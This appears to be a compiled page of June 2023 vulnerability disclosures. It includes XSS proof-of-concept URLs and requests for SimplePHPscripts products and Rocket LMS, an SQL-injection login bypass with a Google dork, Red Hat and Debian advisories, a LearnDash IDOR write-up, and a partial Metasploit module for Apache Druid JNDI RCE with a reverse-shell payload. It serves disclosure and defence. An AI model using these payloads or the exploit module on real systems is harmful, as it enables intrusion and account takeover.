Event Script version 2.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/event-script-php/                             ││  Vendor   : SimplePHPscripts                                                           ││  Software : Event Script 2.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/ekhfb"><script>alert(1)</script>cg9xj?search=123Path: /preview.phpGET 'message' parameter is vulnerable to RXSShttps://website/preview.php?message=fy3sr<script>alert(1)</script>aqblo[-] Done

Event Script 2.1 Cross Site Scripting

Classified Ads Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/classified-ads-script-php/                    ││  Vendor   : SimplePHPscripts                                                           ││  Software : Classified Ads Script 1.8                                                  ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search=Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search=## Stored XSS-----------------------------------------------POST /classified-ads-script-php/classifiedscript/user.php HTTP/2Content-Disposition: form-data; name="title"<script>alert(1)</script>-----------------------------------------------POST parameter 'title' is vulnerable to XSS## Steps to Reproduce:1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds)2. Inject your [XSS Payload] in "Enter Title"3. Save4. XSS Fired on Local User Browser5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads)6. XSS Will Fire and Executed on his Browser [-] Done

Classified Ads Script 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3853-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3853-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3853  
Issue date:        2023-06-27  
CVE Names:         CVE-2023-1281 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
kpatch-patch-4_18_0-147_77_1-1-6.el8_1.src.rpm  
kpatch-patch-4_18_0-147_78_1-1-5.el8_1.src.rpm  
kpatch-patch-4_18_0-147_80_1-1-4.el8_1.src.rpm  
kpatch-patch-4_18_0-147_81_1-1-3.el8_1.src.rpm  
kpatch-patch-4_18_0-147_83_1-1-2.el8_1.src.rpm

ppc64le:  
kpatch-patch-4_18_0-147_77_1-1-6.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-6.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-6.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_78_1-1-5.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_78_1-debuginfo-1-5.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_78_1-debugsource-1-5.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_80_1-1-4.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_80_1-debuginfo-1-4.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_80_1-debugsource-1-4.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_81_1-1-3.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_81_1-debuginfo-1-3.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_81_1-debugsource-1-3.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_83_1-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_83_1-debuginfo-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_83_1-debugsource-1-2.el8_1.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-147_77_1-1-6.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-6.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-6.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_78_1-1-5.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_78_1-debuginfo-1-5.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_78_1-debugsource-1-5.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_80_1-1-4.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_80_1-debuginfo-1-4.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_80_1-debugsource-1-4.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_81_1-1-3.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_81_1-debuginfo-1-3.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_81_1-debugsource-1-3.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_83_1-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_83_1-debuginfo-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_83_1-debugsource-1-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJsFr9zjgjWX9erEAQg99w//SduD1U2YjvMY6nEYxosceYfaesKOn9DQ  
lx42HQW/yxYRIRQBlF/reuVXQJw3I0lbxA+EdM3LgTwBeJgjrfj3+xVbiIQy9Ohl  
h95/Gw16ytnV0c61swTR0Ay7/hdD71WVuy8eRAyOb4spXmuDKzOo5TN4HjODhUec  
I9W/AcGunbUFb2wjt6PeVjz6RGXggs/rAepfl6IP5bXlHOfiKGT8dV7cUQsOEw9w  
vkKTpbUd8qX9LOs5B/t8Odr+ZOQ4jpStB9J1A5hz5jOC1/95k/x8zSqnYHBTi8y9  
CriK9ILofAc52l5TPlEqV2ApK+hGd3LcFU/BwhJQgl3BKtErN9ZjYAHk3omwArLT  
ajOdaLnPwqHITXJ0VPWQN25s949M8TjkChnB4QSBY8swGQx8O0JRYM/2EzERnxYi  
1t6VB2pWIMKq4Wcc2T26BhsAZFCILCGWJ2v3l2rayKileKLyTxEZ+xaDCax5ED4K  
SoftSK0HWpc1STMcoGCZNsxF3/XXpoZ6oX/pg7FZ2j8PywznUBYoCIAHg05WSJXl  
nhMk8F1W/vbLLPDslG5nVbLnnsyMEN5SQBZ8Tl3etpYBqr8i6o9enAscu9QR6I2s  
UvDVff+xPk0c9XRYh2FpV/HU15/rrmKS1vLyZ7MrXGPczM8vyZCXONHkJea4jo8/  
ADqeWSpsSZg=  
=92WA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3853-01

GuestBook Script version 2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/guestbook-script-php/                         ││  Vendor   : SimplePHPscripts                                                           ││  Software : GuestBook Script 2.2                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=newPath: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x[-] Done

GuestBook Script 2.2 Cross Site Scripting

Red Hat Security Advisory 2023-3813-01 - An update for mtr-operator-bundle-container, mtr-operator-container, mtr-web-container, and mtr-web-executor-container is now available for Migration Toolkit for Runtimes 1 on RHEL 8.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Runtimes security update  
Advisory ID:       RHSA-2023:3813-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3813  
Issue date:        2023-06-27  
CVE Names:         CVE-2021-3782 CVE-2022-3627 CVE-2022-3970   
                   CVE-2022-4492 CVE-2022-36227 CVE-2023-0361   
                   CVE-2023-2491 CVE-2023-27535   
=====================================================================

1. Summary:

An update for mtr-operator-bundle-container, mtr-operator-container,  
mtr-web-container, and mtr-web-executor-container is now available for  
Migration Toolkit for Runtimes 1 on RHEL 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.1.1 Images

Security Fix(es):

* undertow: Server identity in https connection is not checked by the  
undertow client (CVE-2022-4492)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client

5. References:

https://access.redhat.com/security/cve/CVE-2021-3782  
https://access.redhat.com/security/cve/CVE-2022-3627  
https://access.redhat.com/security/cve/CVE-2022-3970  
https://access.redhat.com/security/cve/CVE-2022-4492  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-2491  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJsFrNzjgjWX9erEAQjqvBAAgwT2yGcVY1aE8h9lrW8X4Dmb4Yq65hVm  
0Qk6n0BjmDT5kne1VBWwJPyE+oAiLVDmnBI1quqARSmMVZoQVQpcNImwLF0A5pU9  
8xfSvVnaKp7x3fEoxE5gXUQd9z4N7osKtZLg0xvTeHo2ip4BxSpKvyu8TDjorPUk  
YXOkMxi1YZX180suGio4Rtp5GNwOVNdpvLu4o+/XUKzREHVAI6VbB5DI12Joy5I0  
BeQkEkxAWQ6tIh9WIr0QSK82T0f1xsQFNG/tzrNbtRKbcOyiiiv15MINrLFufmLY  
hbxslHSxsFdur8GC6VbsPfMdPDMI3MgMnSYH+2GTz7zalVAIntbfwoWfaJ7b5ZWw  
bP/oohbKuTzGCcWZn2PpqjAPajS00DJTWL8q9EH44PGUv48qS2sDjFyWp6xtNyCp  
ceDOD56qFECZ6hO9STUwJ4pyJPVRI+2+OVzgMaqkQPHAfo6tKv6DJ9BXuWuGdf7g  
5lKDHRhLT8sDNHU91rbjYT31sqiE14jHkseZ8jSExMFJGtwN9gVJmCRxwjPzJuJV  
4hPh5otnYfHeq7jZ4Ra/aUDzeBxVl6w1j3CCGtEaypyZ51hTu5QRzsZ1KyIPQH09  
mrX2H+a9uSkLU+KGyNe1fwKmIVAQca9s+C5SLdmgEFRwAMntCBF5oRSm30xlas9T  
Clr44cObnDs=  
=Yq4r  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3813-01

Alumni Club Management Tools version 2.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload  user : 'or''='@gmail.com pass : 'or''='[+] https://127.0.0.1/edu/admin.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection

Debian Linux Security Advisory 5439-1 - Several vulnerabilities were discovered in BIND, a DNS server implementation.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5439-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : bind9  
CVE ID         : CVE-2023-2828 CVE-2023-2911

Several vulnerabilities were discovered in BIND, a DNS server  
implementation.

CVE-2023-2828

    Shoham Danino, Anat Bremler-Barr, Yehuda Afek and Yuval Shavitt  
    discovered that a flaw in the cache-cleaning algorithm used in named  
    can cause that named's configured cache size limit can be  
    significantly exceeded, potentially resulting in denial of service.

CVE-2023-2911

    It was discovered that a flaw in the handling of recursive-clients  
    quota may result in denial of service (named daemon crash).

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:9.16.42-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:9.18.16-1~deb12u1.

We recommend that you upgrade your bind9 packages.

For the detailed security status of bind9 please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/bind9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSYn4BfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0SIow/+NMkHaZ0gfBNWdISK9yp+eF/TkmoVQqhjUyw7fUGtfyYydgyRmtJhvVoH  
3Qp9/Vw05wJjHPqjsxynLfRcdxKAnRYOFBeMaSa018dXHzxYnyyeeOZPlNdQEAzG  
nPifxiJhRgbbRPmYwQYIDmFVkguhyEClOlHo2xkJW8hbNcA+Nt5wlQ6+ymt4nWwe  
XmA19SWGaYVYUVWbMABXD+GtVPh5GMbdlnHBDSaJ00RSjIiVuhuskP1u2lTZkvju  
mfrj1hi9+uHqhLdEQF6gLORCTX283GsOAO9kmoByKKcP36p1sOrRK24TM3lujq0q  
w5CKFgGIZKU55TDUcIhpYbr4sYvm9LaQ0t6ZpZMISqQrh0zDZ6xgHOqG4bbe2I6q  
izRuI8OP6RCkDOrxUl4K4xX7M4HLgZB7JZ7l/4o+z9+VlDDbWRi+YtTRc/Rks5SI  
9oSFLgbZW43GZqNv7pg2uML5GUAzSgYRFE3tIzKIDPp+gEArJK94PXPAmA2BLXa/  
wUpby4ChIlWj24dTwYF6/VnOrALD6azQbjUafueyTYKG0uqKSI3xxd3LX0dKGGxA  
yFqm8T7qZ8+5sifOMtygbHzav6afqc7oSRm6CNrXcMjdbHooto+4PGl4X3TOWw97  
F7STRwURJrd9CkZ+CJG01Ws/eRgGRqKS/hbxaTyoD7IShdkwOQE=  
=3Zit  
-----END PGP SIGNATURE-----

Debian Security Advisory 5439-1

Rocket LMS version 1.7 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/user/rocketsoft                                     ││  Vendor   : RocketSoft                                                                 ││  Software : Rocket LMS 1.7                                                             ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS------------------------------------------------------------POST /contact/store HTTP/1.1_token=iytfhBpLDYy2flCFdMGcnYGIyvONBDgK60DdwAtn&name=[XSS Payload]&email=cracker@infosec.com&phone=96171951951&subject=[XSS Payload]&message=[XSS Payload]&captcha=32499------------------------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'subject' is vulnerable to XSSPOST parameter 'message' is vulnerable to XSS## Steps to Reproduce:1. Login (as Student) "Normal User"2. Click On [Contact US] on this Path (https://website/contact)3. Inject your [XSS Payload] in "Your name"4. Inject your [XSS Payload] in "Subject"5. Inject your [XSS Payload] in "Message Box"6. Click on [Send Message]5. When ADMIN Visit the [Notifications] - [History] in administration Panel to Check new messages on this Path (https://website/admin/notifications) & Click on [Show]6. XSS will Fire & Executed on his Browser[-] Done

Rocket LMS 1.7 Cross Site Scripting

WordPress LearnDash LMS version 4.6.0 suffers from an insecure direct object reference vulnerability.

    Description: LearnDash LMS <= 4.6.0 – Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change Affected Plugin: LearnDash LMSPlugin Slug: sfwd-lmsAffected Versions: <= 4.6.0CVE ID: CVE-2023-3105CVSS Score: 8.8 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes Fully Patched Version: 4.6.0.1The LearnDash LMS plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for attackers with existing account access at any level, to change user passwords and potentially take over administrator accounts.Technical AnalysisThe LearnDash LMS plugin provides the shortcode ‘[ld_reset_password]‘ to embed a password reset form into a page on a WordPress site. The form allows users to submit their username or email address to receive an email with a password reset link containing a user activation key.Examining the code reveals that the plugin checks that the user activation key belongs to the given user with the learndash_reset_password_verification() function only when displaying the new password form, where the new password can be entered.[View this code snippet on the blog]  However, there is no user activation key check when processing this form. This makes it possible for any authenticated user who has accessed the password reset form via the link sent in the email to modify the password of another user by changing the value of the username hidden input field.[View this code snippet on the blog]  As with any Arbitrary User Password Change that leads to a Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.Disclosure TimelineJune 5, 2023 – Discovery of the Arbitrary User Password Change vulnerability in LearnDash LMS.June 5, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.June 5, 2023 – The vendor confirms the inbox for handling the discussion.June 5, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.June 5, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.June 6, 2023 – A fully patched version of the plugin, 4.6.0.1, is released.July 5, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we have detailed an Arbitrary User Password Change vulnerability within the LearnDash LMS plugin affecting versions 4.6.0 and earlier. This vulnerability allows threat actors to easily take over websites by resetting the password of any user, including administrators. The vulnerability has been fully addressed in version 4.6.0.1 of the plugin. We encourage WordPress users to verify that their sites are updated to the latest patched version of LearnDash LMS.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 5, 2023. Sites still using the free version of Wordfence will receive the same protection on July 5, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress LearnDash LMS 4.6.0 Insecure Direct Object Reference

This Metasploit module is designed to exploit the JNDI injection vulnerability in Druid. The vulnerability specifically affects the indexer/v1/sampler interface of Druid, enabling an attacker to execute arbitrary commands on the targeted server. The vulnerability is found in Apache Kafka clients versions ranging from 2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule, it allows the server to establish a connection with the attacker's LDAP server and deserialize the LDAP response. This provides the attacker with the capability to execute java deserialization gadget chains on the Kafka connect server, potentially leading to unrestricted deserialization of untrusted data or even remote code execution (RCE) if there are relevant gadgets in the classpath. To facilitate the exploitation process, this module will initiate an LDAP server that the target server needs to connect to in order to carry out the attack.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Retry  include Msf::Exploit::Remote::JndiInjection  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(_info = {})    super(      'Name' => 'Apache Druid JNDI Injection RCE',      'Description' => %q{        This module is designed to exploit the JNDI injection vulnerability        in Druid. The vulnerability specifically affects the indexer/v1/sampler        interface of Druid, enabling an attacker to execute arbitrary commands        on the targeted server.        The vulnerability is found in Apache Kafka clients versions ranging from        2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config        property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule,        it allows the server to establish a connection with the attacker's LDAP server        and deserialize the LDAP response. This provides the attacker with the capability        to execute java deserialization gadget chains on the Kafka connect server,        potentially leading to unrestricted deserialization of untrusted data or even        remote code execution (RCE) if there are relevant gadgets in the classpath.        To facilitate the exploitation process, this module will initiate an LDAP server        that the target server needs to connect to in order to carry out the attack.      },      'Author' => [        'RedWay Security <info[at]redwaysecurity.com>', # Metasploit module        'Jari Jääskelä <https://github.com/jarijaas>' # discovery      ],      'References' => [        [ 'CVE', '2023-25194' ],        [ 'URL', 'https://hackerone.com/reports/1529790'],        [ 'URL', 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz' ]      ],      'DisclosureDate' => '2023-02-07',      'License' => MSF_LICENSE,      'DefaultOptions' => {        'RPORT' => 8888,        'SSL' => true,        'SRVPORT' => 3389,        'WfsDelay' => 30      },      'Targets' => [        [          'Windows', {            'Platform' => 'win'          },        ],        [          'Linux', {            'Platform' => 'unix',            'Arch' => [ARCH_CMD],            'DefaultOptions' => {              'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'            }          },        ]      ],      'Notes' => {        'Stability' => [CRASH_SAFE],        'SideEffects' => [IOC_IN_LOGS],        'Reliability' => [REPEATABLE_SESSION]      }    )    register_options([      OptString.new('TARGETURI', [ true, 'Base path', '/'])    ])  end  def check    validate_configuration!    vprint_status('Attempting to trigger the jndi callback...')    start_service    res = trigger    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?    retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received }    return 